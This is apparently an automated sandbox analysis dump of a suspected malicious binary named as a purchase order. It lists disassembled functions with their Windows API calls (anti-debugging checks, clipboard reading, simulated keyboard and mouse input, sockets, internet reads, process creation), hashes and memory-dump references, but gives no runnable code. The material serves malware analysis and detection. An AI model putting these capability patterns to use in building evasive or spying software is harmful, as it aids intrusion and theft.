                                  • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                  • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                  • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                  • Sleep.KERNEL32(0000000A), ref: 0045250B
                                  • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                  • FindClose.KERNEL32(?), ref: 004525FF
                                  Strings
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                  • String ID: *.*$\VH
                                  • API String ID: 2786137511-2657498754
                                  • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                  • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                  • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                  • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                  Strings
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID: pqI
                                  • API String ID: 2579439406-2459173057
                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                  APIs
                                  • __wcsicoll.LIBCMT ref: 00433349
                                  • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                  • __wcsicoll.LIBCMT ref: 00433375
                                  • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                  Strings
                                  Similarity
                                  • API ID: __wcsicollmouse_event
                                  • String ID: DOWN
                                  • API String ID: 1033544147-711622031
                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044C3D2
                                  • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                  • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                  • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                  Similarity
                                  • API ID: KeyboardMessagePostState$InputSend
                                  • String ID:
                                  • API String ID: 3031425849-0
                                  • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                  • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                  • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                  • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                  APIs
                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                  • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                  Similarity
                                  • API ID: ErrorLastinet_addrsocket
                                  • String ID:
                                  • API String ID: 4170576061-0
                                  • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                  • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                  • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                  • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004478E2
                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                  • NtdllDialogWndProc_W.USER32(?,0000007B,?,?), ref: 0044791D
                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                  • TrackPopupMenuEx.USER32(019E63D0,00000000,00000000,?,?,00000000), ref: 00447991
                                  Similarity
                                  • API ID: CursorMenuPopupTrack$DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 192203443-0
                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                  APIs
                                  • GetClientRect.USER32(?,?), ref: 004479CC
                                  • GetCursorPos.USER32(?), ref: 004479D7
                                  • ScreenToClient.USER32(?,?), ref: 004479F3
                                  • WindowFromPoint.USER32(?,?), ref: 00447A34
                                  • NtdllDialogWndProc_W.USER32(?,00000020,?,?), ref: 00447AAD
                                  Similarity
                                  • API ID: Client$CursorDialogFromNtdllPointProc_RectScreenWindow
                                  • String ID:
                                  • API String ID: 4176674648-0
                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                  APIs
                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                  • IsWindowVisible.USER32 ref: 0047A368
                                  • IsWindowEnabled.USER32 ref: 0047A378
                                  • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                  • IsIconic.USER32 ref: 0047A393
                                  • IsZoomed.USER32 ref: 0047A3A1
                                  Similarity
                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                  • String ID:
                                  • API String ID: 292994002-0
                                  • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                  • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                  • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                  • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                  APIs
                                  • GetParent.USER32(?), ref: 004503C8
                                  • NtdllDialogWndProc_W.USER32(?,00000138,?,?), ref: 00450417
                                  • NtdllDialogWndProc_W.USER32(?,00000133,?,?), ref: 00450466
                                  • NtdllDialogWndProc_W.USER32(?,00000134,?,?), ref: 00450497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_$Parent
                                  • String ID:
                                  • API String ID: 3146699748-0
                                  • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                  • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                  • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                  • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                  APIs
                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                  • CloseClipboard.USER32 ref: 0046DD0D
                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                  • CloseClipboard.USER32 ref: 0046DD41
                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                  • CloseClipboard.USER32 ref: 0046DD99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                  • String ID:
                                  • API String ID: 15083398-0
                                  • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                  • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                  • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                  • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: U$\
                                  • API String ID: 4104443479-100911408
                                  • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                  • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                  • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                  • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                  • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                  • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                  • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                  APIs
                                  • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                  • FindClose.KERNEL32(00000000), ref: 004339EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: FileFind$AttributesCloseFirst
                                  • String ID:
                                  • API String ID: 48322524-0
                                  • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                  • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                  • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                  • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                  APIs
                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                  • String ID:
                                  • API String ID: 901099227-0
                                  • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                  • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                  • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                  • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                  APIs
                                  • GetParent.USER32(?), ref: 004503C8
                                  • NtdllDialogWndProc_W.USER32(?,00000138,?,?), ref: 00450417
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllParentProc_
                                  • String ID:
                                  • API String ID: 2395719762-0
                                  • Opcode ID: 257248ebf188e141d38afd5c48be2ff607e0986a31bd54eef4ebc635ce2a3468
                                  • Instruction ID: c99212cd859981529d564057689d428d6c5f9a70333a9b0d3c053c51a1006402
                                  • Opcode Fuzzy Hash: 257248ebf188e141d38afd5c48be2ff607e0986a31bd54eef4ebc635ce2a3468
                                  • Instruction Fuzzy Hash: 6911D6351062C0ABD7139B38CC8589B3F68DE43335B18069BF9984F2A3CA344849CB6B
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000114,00000000,?), ref: 0046A41E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: 48e87686a5ea7b01e998f9eaac7baca7642045ed066bdf8ff442be2b7787ab7b
                                  • Instruction ID: c63ea47e1094e29e9280ddef29c929305bd4827c6ad27dba34d4d07e9709e350
                                  • Opcode Fuzzy Hash: 48e87686a5ea7b01e998f9eaac7baca7642045ed066bdf8ff442be2b7787ab7b
                                  • Instruction Fuzzy Hash: DF1127322001046BDB10CB04DC849AB7B24EF86324F20811BF60597282CF799C62DBA6
                                  APIs
                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00447B1B
                                  • NtdllDialogWndProc_W.USER32(?,0000002B,?,?), ref: 00447B41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogMessageNtdllProc_Send
                                  • String ID:
                                  • API String ID: 3814093946-0
                                  • Opcode ID: 4cacbd902a3e8074bd40219f09cd08209c02a14dfdcaa0ba7cf7d9d990aaa468
                                  • Instruction ID: c1d44d43ee376328972d656b5f00bca06b75d59f5ecfdf91114eb8bc10ef771e
                                  • Opcode Fuzzy Hash: 4cacbd902a3e8074bd40219f09cd08209c02a14dfdcaa0ba7cf7d9d990aaa468
                                  • Instruction Fuzzy Hash: C611C832200250ABE220DF45EC84FABB769FBD6728F10462FF6404B290C775A846C765
                                  APIs
                                    • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                    • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                  • NtdllDialogWndProc_W.USER32(?,00000201,?), ref: 00462A03
                                  • NtdllDialogWndProc_W.USER32(?,00000204,?,00000000), ref: 00462A24
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AsyncDialogNtdllProc_State$ClientCursorScreen
                                  • String ID:
                                  • API String ID: 2121657457-0
                                  • Opcode ID: 3aa67e009f936217d0391dd0aa5e8dd8940afc03e729d5e986ef420fd54892e7
                                  • Instruction ID: 08c67b91cd2399f8ba12915c6cae0ffbb32616dfeb2567f7c91428428e8fa67e
                                  • Opcode Fuzzy Hash: 3aa67e009f936217d0391dd0aa5e8dd8940afc03e729d5e986ef420fd54892e7
                                  • Instruction Fuzzy Hash: 76018172240124BBE7049F86EC99DFFB76CEB85762F10402BFA4197192C6B59811CBB5
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,?,?,?), ref: 0047EA9E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                  • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                  • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                  • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000006,?,?), ref: 004404DC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: 2b72283bca5b9e831272dd2a7d53a0b5c7148644ca1e9fa5d4a4720e5b910540
                                  • Instruction ID: 57bcafdb766b4b2a09d5adb44fbeadd94fd8413be8ed8c1894e52dfe49116fd8
                                  • Opcode Fuzzy Hash: 2b72283bca5b9e831272dd2a7d53a0b5c7148644ca1e9fa5d4a4720e5b910540
                                  • Instruction Fuzzy Hash: 1EF0B471500254ABE7148F05DC40A7B7B79EB86720F20461EFA144B280CB75AC62CBF4
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000053,?,?), ref: 004403A3
                                    • Part of subcall function 00430B0F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004A9568,004A9554), ref: 00430B6C
                                    • Part of subcall function 00430B0F: CloseHandle.KERNEL32(00000000), ref: 00430B7D
                                  Memory Dump Source
